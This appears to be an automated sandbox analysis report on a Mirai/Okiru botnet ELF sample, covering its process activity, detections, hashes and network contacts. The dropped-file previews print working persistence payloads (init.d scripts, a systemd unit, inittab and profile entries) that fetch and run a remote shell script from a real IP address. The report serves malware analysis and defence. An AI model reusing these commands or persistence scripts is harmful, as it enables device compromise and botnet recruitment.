Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5734/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5636/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5735/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5637/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5736/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5638/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5639/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5650/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5651/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5630/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5631/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5730/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5728/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5729/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5643/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5720/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5644/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5721/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5645/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5722/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/803/cmdline	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5646/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5723/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5647/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5724/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5648/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5725/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5649/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5726/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5587)	File opened: /proc/5727/status	Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 5546)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5574)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5576)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5578)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.229/lol.sh -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5579)	Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5581)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 5583)	Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 5575)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 5580)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh			Jump to behavior

Source: /bin/sh (PID: 5582)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /usr/bin/dash (PID: 5509)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.39ZHOVXeyH /tmp/tmp.10MVApFg4v /tmp/tmp.xfkh797qb6			Jump to behavior
Source: /usr/bin/dash (PID: 5510)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.39ZHOVXeyH /tmp/tmp.10MVApFg4v /tmp/tmp.xfkh797qb6			Jump to behavior

Source: /bin/sh (PID: 5557)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 5537)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5575)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 5580)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 5537)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/x86_64.nn.elf (PID: 5537)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 5578)	Writes shell script file to disk with an unusual file extension: /etc/init.d/sh	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/x86_64.nn.elf (PID: 5537)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 5578)	File: /etc/init.d/sh			Jump to dropped file

Sample deletes itself

Source: /tmp/x86_64.nn.elf (PID: 5588)

File: /tmp/x86_64.nn.elf

Jump to behavior

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match	File source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_64.nn.elf PID: 5537, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match	File source: 5537.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_64.nn.elf PID: 5537, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Non-Standard Port	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	11 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Source	Detection	Scanner	Label	Link
x86_64.nn.elf	26%	ReversingLabs	Linux.Backdoor.Mirai
x86_64.nn.elf	30%	Virustotal		Browse
x86_64.nn.elf	100%	Avira	EXP/ELF.Mirai.W
x86_64.nn.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.24	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.229/	x86_64.nn.elf	false		high
http://94.156.227.229/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	x86_64.nn.elf	false	Avira URL Cloud: safe	unknown
http://94.156.227.229/lol.sh	x86_64.nn.elf, 5537.1.00007fff2783b000.00007fff2785c000.rw-.sdmp, system.16.dr, inittab.16.dr, sh.34.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.227.234	unknown	Bulgaria		57463	NETIXBG	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
94.156.227.234	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	arm5.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.24
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.25
	m68k.nn.elf	Get hash	malicious	Okiru	Browse	162.213.35.24
	db0fa4b8db0333367e9bda3ab68b8042.arc.elf	Get hash	malicious	Gafgyt, Mirai	Browse	162.213.35.24
	RpcSecurity.x86.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	.i.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	RpcSecurity.arm7.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	RpcSecurity.mpsl.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	RpcSecurity.ppc.elf	Get hash	malicious	Unknown	Browse	162.213.35.25
	RpcSecurity.arm.elf	Get hash	malicious	Unknown	Browse	162.213.35.24

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NETIXBG	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm5.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/system	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
/etc/init.d/sh	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
/etc/rc.local	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	m68k.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	117
Entropy (8bit):	4.611465664935645
Encrypted:	false
SSDEEP:	3:KPJRK+KFtSyLdjX43LbaaFOdFXa5O:WJ8+KHSYZX47baaeXCO
MD5:	5048E92AD58F7747D00978468934F1CB
SHA1:	0DB71D81203AA33366E877D18275460E8D073848
SHA-256:	828A051E2C55674E95B341A0FC26ADA8F8390C9AFCF4E41EFA24A8EF06B4978D
SHA-512:	60BFF7E87BD8BFA48680F4E4666435D4853FA68B2265366C8193B17BABAFD0416AABBC8A4C8C183E3A1FC5F70999726066B729849F48C71E6784EB14141191DD
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /bin/sh && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/sh

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	361
Entropy (8bit):	4.413818877229108
Encrypted:	false
SSDEEP:	6:h2Rk8d/Kd6Nx/SNAjDTZX47JaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovpD:QRkobNxaNoKUJgjvM1F5KN+dRRucSOyl
MD5:	91BDEB7CE9566CE3AFA89BAD9FE3196A
SHA1:	82A5A53602B46466A353BF97C355E27B5A0559BA
SHA-256:	4DA30E74C2351DE13124E29852D476658180D8CAE3A77D5AFE1629684E53FFC0
SHA-512:	8D25F01129757B00D56C69A04E7B14F4FE298D906E138DDF10E16D4FA8E0F8932A4DC20B75879DC6A49D2FD93CE6C87A8A387EEB5B9450F512C43B212F91427A
Malicious:	true
Joe Sandbox View:	Filename: x86_32.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.229/lol.sh -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.549982831581783
Encrypted:	false
SSDEEP:	3:TKH4v9+KFyFiLdjX43LpaKB0dFLoKE0:h8KooZX47zBeLXE0
MD5:	F91F2A4D88C73DFC7F71AF07E7244FBD
SHA1:	A0EBF1224A9C0AB64D6F379CF2D3F6EF5FF35D2B
SHA-256:	786AE2C2150AF9274605E00A4580CC998F66B051258892917E510F8C5978FF14
SHA-512:	BEF8101B6C00053E7B8DB9F21A393525520F007B33E6B7F21A0DF3936B7C802AEC1DE66E8B1FF217006507B6D5C88398DDB6F79DB0C01650025EDBB97B6D7CF3
Malicious:	true
Joe Sandbox View:	Filename: x86_32.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh./bin/sh &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	109
Entropy (8bit):	4.555715788256913
Encrypted:	false
SSDEEP:	3:nAWu5YFtSyLdjX43LbaaFOdFXa5O:A6HSYZX47baaeXCO
MD5:	2DF91F4FB4FBD0738FC347B0C09F0CEA
SHA1:	E905F83DF7076F5646E0728C946C4C7D0483DFF9
SHA-256:	9023CDD1CAB339E440D341143E390AA31824A3BA8CF3AE8BD7E80B61D63A5569
SHA-512:	5E935A8BCAE88974C3302DB840F1F957F96C5C6D41418A369CA1B69236E8FB28BAA9F66F8F8A232C8A7CBADA4DB9BFA7637677A672CD33A2132FF8D64465B3C0
Malicious:	false
Reputation:	low
Preview:	::respawn:/bin/sh && wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	100
Entropy (8bit):	4.42736323501118
Encrypted:	false
SSDEEP:	3:pKWNFyFiLdjX43LbaaFOdFXa50:kKooZX47baaeXC0
MD5:	6BDCD8C4621FF9685F1F2BAA41133C78
SHA1:	EF43494B05CBEEEE55D04AEF3528A2AA0A6DA1F8
SHA-256:	E8AFF9F1C83A562747D04B2A1075E89DD4825ED201BE9A4A6F697DA42B5AAEDF
SHA-512:	5FA4B0EE10F3B280380F2A303F3228CC5D7914129A78DE8F47885E860A8BAC41BF226C8C2814116593FC6937E4DD363A96E55945697CF32B60294F9E1CAF7EC9
Malicious:	true
Preview:	/bin/sh &.wget http://94.156.227.229/lol.sh -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: arm7.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: arm5.nn.elf, Detection: malicious, Browse Filename: mips.nn.elf, Detection: malicious, Browse Filename: mipsel.nn.elf, Detection: malicious, Browse Filename: sparc.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: m68k.nn.elf, Detection: malicious, Browse Filename: powerpc.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	298
Entropy (8bit):	5.048842181507798
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+Gs2+GWRAZX47N2+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRkKY+GWRXY+GWRuL1I
MD5:	AEC69B92F08E955E33C19CECDDBBAD0C
SHA1:	644E1CFC37AA49361C5E79EB57B4740B210F1D90
SHA-256:	4177912BFC8C7BA82B99473ACABEE592E860966770E0FC755E877B1AF4D05F08
SHA-512:	786D665A6F8678529610E8F6DF99C469A786577F042C358DA4E3589D554B475A6401B037D5C8708FDD57014EDB517EC17786FC95548CC9D5A9A81AF5476C8D44
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget http://94.156.227.229/lol.sh -O /tmp/lol.sh.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.335613217441789
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	x86_64.nn.elf
File size:	80'064 bytes
MD5:	279351defe09a28e3c35194c0e594f37
SHA1:	b8aa1c1fb5def2c6fcc409af7e53a3f853c6a361
SHA256:	01c4719adf5639b43828a97fe4716353204b02c3d146e8a024f978dc5950b40a
SHA512:	0dede7471a010148bb457fcb1871150d59b721439b93a53d5c1fe42f6a2127bdc43b410d393e2b712f015fdefb31aac4b5676c7fa8bf5bfe8ed7e5c2b9a0dce7
SSDEEP:	1536:OOuYSHYqo7YeNVylX3w4OY/P+Bqt185OhN1Hh74YV:WYS4pbzylnw4OY/P+k185OxHh7j
TLSH:	47733B077881D0FCC55EC27457AFF23AD976B07D0239B2AA27D8FB226E49D205B1E944
File Content Preview:	.ELF..............>.......@.....@.......@6..........@.8...@.......................@.......@.....P/......P/.......................0.......0Q......0Q............../..............Q.td....................................................H...._....:...H........

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400194
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	3
Section Header Offset:	79424
Section Header Size:	64
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x4000e8	0xe8	0x13	0x0	0x6	AX	1
.text	PROGBITS	0x400100	0x100	0x10566	0x0	0x6	AX	16
.fini	PROGBITS	0x410666	0x10666	0xe	0x0	0x6	AX	1
.rodata	PROGBITS	0x410680	0x10680	0x28d0	0x0	0x2	A	32
.ctors	PROGBITS	0x513000	0x13000	0x10	0x0	0x3	WA	8
.dtors	PROGBITS	0x513010	0x13010	0x10	0x0	0x3	WA	8
.data	PROGBITS	0x513040	0x13040	0x5c0	0x0	0x3	WA	32
.bss	NOBITS	0x513600	0x13600	0x29a8	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0x13600	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x12f50	0x12f50	6.3971	0x5	R E	0x100000	.init .text .fini .rodata
LOAD	0x13000	0x513000	0x513000	0x600	0x2fa8	3.8477	0x6	RW	0x100000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x8

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 09:23:08.636909962 CET	38198	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:08.756614923 CET	38242	38198	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:08.756721973 CET	38198	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:08.756750107 CET	38198	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:08.876339912 CET	38242	38198	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:09.311717033 CET	38198	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:09.476545095 CET	38242	38198	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:09.940177917 CET	38242	38198	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:09.940258026 CET	38198	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:10.322390079 CET	38200	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:10.442651033 CET	38242	38200	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:10.442742109 CET	38200	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:10.442774057 CET	38200	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:10.562417030 CET	38242	38200	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:10.960000992 CET	38200	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:11.120925903 CET	38242	38200	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:11.623013973 CET	38242	38200	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:11.623136997 CET	38200	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:11.964426994 CET	38202	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:12.084074974 CET	38242	38202	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:12.084166050 CET	38202	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:12.084166050 CET	38202	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:12.204122066 CET	38242	38202	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:12.671943903 CET	38202	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:12.832616091 CET	38242	38202	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:13.262443066 CET	38242	38202	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:13.262542963 CET	38202	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:13.679991007 CET	38204	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:13.799899101 CET	38242	38204	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:13.800005913 CET	38204	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:13.800086021 CET	38204	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:13.919790983 CET	38242	38204	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:14.318671942 CET	38204	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:14.482057095 CET	38242	38204	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:15.022196054 CET	38242	38204	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:15.022289991 CET	38204	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:15.320616961 CET	38206	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:15.441555023 CET	38242	38206	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:15.441688061 CET	38206	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:15.441689014 CET	38206	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:15.562525988 CET	38242	38206	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:15.949269056 CET	38206	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:16.112849951 CET	38242	38206	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:16.634293079 CET	38242	38206	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:16.634583950 CET	38206	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:16.951503992 CET	38208	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:17.071207047 CET	38242	38208	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:17.071279049 CET	38208	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:17.071316957 CET	38208	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:17.190922022 CET	38242	38208	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:17.586384058 CET	38208	38242	192.168.2.15	94.156.227.234
Dec 27, 2024 09:23:17.748605013 CET	38242	38208	94.156.227.234	192.168.2.15
Dec 27, 2024 09:23:18.263948917 CET	38242	38208	94.156.227.234	192.168.2.15
